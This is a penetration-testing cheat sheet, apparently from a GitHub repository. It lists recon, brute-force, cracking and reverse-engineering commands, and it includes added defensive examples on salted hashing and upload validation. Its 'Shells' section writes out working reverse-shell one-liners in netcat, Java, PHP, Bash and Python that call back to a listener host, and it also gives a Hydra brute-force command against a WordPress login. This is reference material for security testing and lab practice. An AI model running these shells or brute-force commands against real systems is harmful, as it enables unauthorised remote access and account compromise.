This is a simple Cheat Sheet which can be helpful while pentesting

DennisFeldbusch/CheatSheet

CheatSheet

Planned ToDo's

  • write scripts for automating the repetitive tasks like:

    1. look for domain of the company
    2. look for subdomains of the domain
    3. look for dns entries
    4. use Google Hacking for deeper recon
    5. generate a detailed report of all findings
    6. ...
  • create a docker-based environment for pentesting/bug bounty hunting (find a way for running GUI based tools in docker)

Useful Guides and Links

For Pentesting/BugBounty-Hunting there is a very detailed map and guide of how to proceed.

Very useful BugBounty CheatSheet from EdOverflow

Bug Bounty Writeups for learning

Local Webserver

Python

python -m SimpleHTTPServer
python3 -m http.server

PHP

php -S 0.0.0.0:8000

Ruby

ruby -run -e httpd . -p 8000

Useful Tools

scans networks

nmap -sC -sV -oA nmap/openadmin 10.10.10.171
  • -sC = scans with the standard scripts
  • -sV = scans the versions

bruteforce websites to find directories and/or files

gobuster dir -u http://10.10.10.10/ -w /path/to/wordlist

scans a target for wordpress related stuff

## basic scan
wpscan --url 10.10.10.10

## advanced scan with plugin detection
wpscan --url 10.10.10.10 --enumerate p,u --plugins-detection aggressive

creates wordlist from website

cewl -d 2 -m 5 -w genwords.txt https://10.10.10.10

enumerates Windows and Samba systems

Ports to look for: 445, 139

enum4linux -U -o 10.10.10.10

finding specific filetypes in domain

goofile -d kali.org -f pdf
searchsploit tomcat

John the Ripper works differently from tools like Hydra. Hydra brute-forces blindly by trying username/password combinations against a service daemon such as an FTP or Telnet server. John needs the hash first, so the greater challenge for an attacker is obtaining the hash that is to be cracked. Nowadays hashes of common words are easily reversed using free rainbow tables available online: submit the hash to one of these sites and, if it was made from a common word, the site shows the word almost instantly. Rainbow tables essentially store common words together with their hashes in a large database; the larger the database, the more words are covered.
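The point above in code, as an added example that is not part of the original cheat sheet: a precomputed table reverses an unsalted hash of a common word instantly, while a per-user random salt with PBKDF2 (the defensive storage format used here) makes the same table useless. The wordlist and salt values are constructed.

```python
# Added example (not from the cheat sheet): precomputed-table lookup vs. salted storage.
import hashlib
import hmac
import os

# Constructed five-word "wordlist"; a real lookup/rainbow table holds millions of entries.
WORDLIST = ["password", "letmein", "qwerty", "dragon", "monkey"]


def unsalted_hash(word: str, algo: str = "md5") -> str:
    """Plain hash of a word: the form a rainbow table can reverse."""
    return hashlib.new(algo, word.encode()).hexdigest()


def build_table(words, algo: str = "md5") -> dict:
    """Precompute hash -> word for every word (what a lookup table stores)."""
    return {unsalted_hash(w, algo): w for w in words}


def lookup(table: dict, hex_digest: str):
    """Instant reversal, but only if exactly this hash is in the table."""
    return table.get(hex_digest.lower())


def hash_with_salt(password: str, salt: bytes, iterations: int = 100_000) -> str:
    """Stored as salt$iterations$pbkdf2-sha256. A random per-user salt makes every
    user's hash unique, so one precomputed table cannot cover them all."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${dk.hex()}"


def verify_salted(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, iters, _ = stored.split("$")
    candidate = hash_with_salt(password, bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(candidate, stored)


if __name__ == "__main__":
    table = build_table(WORDLIST)
    print(lookup(table, unsalted_hash("letmein")))        # letmein: found instantly
    stored = hash_with_salt("letmein", os.urandom(16))
    print(lookup(table, stored.split("$")[2]))           # None: the table does not help
    print(verify_salted("letmein", stored))              # True
```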

| Command | Description |
| --- | --- |
| john --wordlist=/usr/share/wordlists/rockyou.txt hash | JTR password cracking |
| john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt | JTR forced descrypt cracking with wordlist |
| john --format=descrypt hash --show | JTR forced descrypt brute force cracking |
hydra -L wordlist -p test 10.10.147.44 -V http-form-post "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid Username" -t 30

Tool to read and modify the metadata of files.

read metadata

exiftool <file>

write metadata

exiftool -artist=me <file>

radare2 is a tool for reverse-engineering

# start radare2
radare2 file

# analyze all
aa 

# list all functions 
afl

# set selection to main function
s main 

# disassemble
pdf 

# show graph
VV

wfuzz is a web fuzzing tool

example of finding vhosts

wfuzz -H "Host: FUZZ.<domain>" -c -z file,"<path/to/wordlist>" <domain>

Reverse Engineering

Get strings from binary

strings binaryFile

Get hexdump from binary

hexdump --canonical binaryFile

Get assembly

objdump -D -M x86-64 binaryFile

Use radare2 to reverse engineer binary

x86 registers

  ================ rax (64 bits)
          ======== eax (32 bits)
              ====  ax (16 bits)
              ==    ah (8 bits)
                ==  al (8 bits)

register purposes

| Register | Purpose | Saved across calls |
| --- | --- | --- |
| RAX | temp register; return value | no |
| RBX | callee-saved | yes |
| RCX | used to pass 4th argument to functions | no |
| RDX | used to pass 3rd argument to functions | no |
| RSP | stack pointer | yes |
| RBP | callee-saved; base pointer | yes |
| RSI | used to pass 2nd argument to functions | no |
| RDI | used to pass 1st argument to functions | no |
| R8 | used to pass 5th argument to functions | no |
| R9 | used to pass 6th argument to functions | no |
| R10-11 | temporary | no |
| R12-15 | callee-saved registers | yes |

RISC (ARM) instruction set

MOV DESTINATION, SOURCE

Stack

Stackpointer

  • points to the top of the stack (the most recently pushed item)
  • the stack grows downwards (towards lower addresses)

Base pointer

  • fixed reference point in memory marking where the current stack frame starts
memory:                  CPU:

0x0000                  ________ 
|    | <--------------  |  SP  |
|    |        |-------  |  BP  |
|    |        |         |  IP  |
|    | <------|         |  ..  |
|    |                  |  ..  |
|    |                  |  ..  |
0xFFFF                  |______|

Shells

Set Listener

nc -lnvp 4000

netcat

nc -e /bin/sh 10.10.15.22 4000

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.15.22/4000;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

PHP

php -r '$sock=fsockopen("10.10.15.22",4000);exec("/bin/sh -i <&3 >&3 2>&3");'

php -r '$sock=fsockopen("10.0.0.1",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Bash

bash -i >& /dev/tcp/10.10.15.22/4000 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.22",4000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Interactive Shell

  • can be executed with python or python3

Bash

python(3) -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo
fg

Zsh

python(3) -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
stty raw -echo; fg

Useful Scripts

HEX Converter

Ascii to Hex

#!/bin/bash
# print the argument as hex bytes, 16 per line (printf avoids the trailing newline that echo adds)
printf '%s' "$1" | hexdump -v -e '16/1 "%02x " "\n"'

Hex to Ascii

#!/bin/bash
# decode a hex string (e.g. 48656c6c6f) back to ASCII
printf '%s' "$1" | xxd -r -p

Hide yourself

Interesting Stack Exchange link

A proxy is an intermediary between the two communication partners. If you send a request to a server, the proxy intercepts it and forwards it to the server as if it had sent the request itself, so the server does not learn who the original client is. The reply takes the same path back.

A proxy chain is multiple proxy servers chained together, so it is much harder to find out who the initial sender (client) was.

Here is a nice graphic on who sees what in Tor and HTTPS cases.

File Uploads

Use

Magic Numbers

  • these magic numbers (the first bytes of a file) define the type of the file

BMP : 42 4D
JPG : FF D8 FF E0
PNG : 89 50 4E 47
GIF : 47 49 46 38
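How an upload handler should use these signatures, as an added example that is not part of the original cheat sheet: the file type is decided by the magic number, not by the client-supplied extension, and the two must agree. The signature table is the four entries above; the allowed set and the sample files are assumptions.

```python
# Added example (not from the cheat sheet): validate uploads by magic number.
from pathlib import Path
from typing import Optional, Tuple

# Signature table taken from the cheat sheet, as raw bytes.
MAGIC = {
    "bmp": bytes.fromhex("424D"),
    "jpg": bytes.fromhex("FFD8FFE0"),
    "png": bytes.fromhex("89504E47"),
    "gif": bytes.fromhex("47494638"),
}
# Assumption: the upload handler only accepts these image types.
ALLOWED = {"jpg", "png", "gif"}


def detect_type(data: bytes) -> Optional[str]:
    """Return the type whose magic number matches the start of data, else None."""
    for name, sig in MAGIC.items():
        if data.startswith(sig):
            return name
    return None


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Accept only if the magic number is an allowed type AND agrees with the extension."""
    ext = Path(filename).suffix.lower().lstrip(".")
    ext = "jpg" if ext == "jpeg" else ext
    detected = detect_type(data)
    if detected is None:
        return False, "unknown magic number"
    if detected not in ALLOWED:
        return False, f"type {detected} not allowed"
    if ext != detected:
        return False, f"extension .{ext} does not match content ({detected})"
    return True, detected


if __name__ == "__main__":
    # Constructed samples: a PNG header, and a text file renamed to .png
    png = bytes.fromhex("89504E470D0A1A0A") + b"\x00" * 16
    text = b"this is not an image"
    print(check_upload("avatar.png", png))    # (True, 'png')
    print(check_upload("avatar.png", text))   # (False, 'unknown magic number')
    print(check_upload("avatar.jpg", png))    # (False, 'extension .jpg does not match content (png)')
```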

Privilege Escalation

  • find programs which can be executed with sudo without a password
sudo -l
  • find files that belong to root but can be read by anyone because of group permissions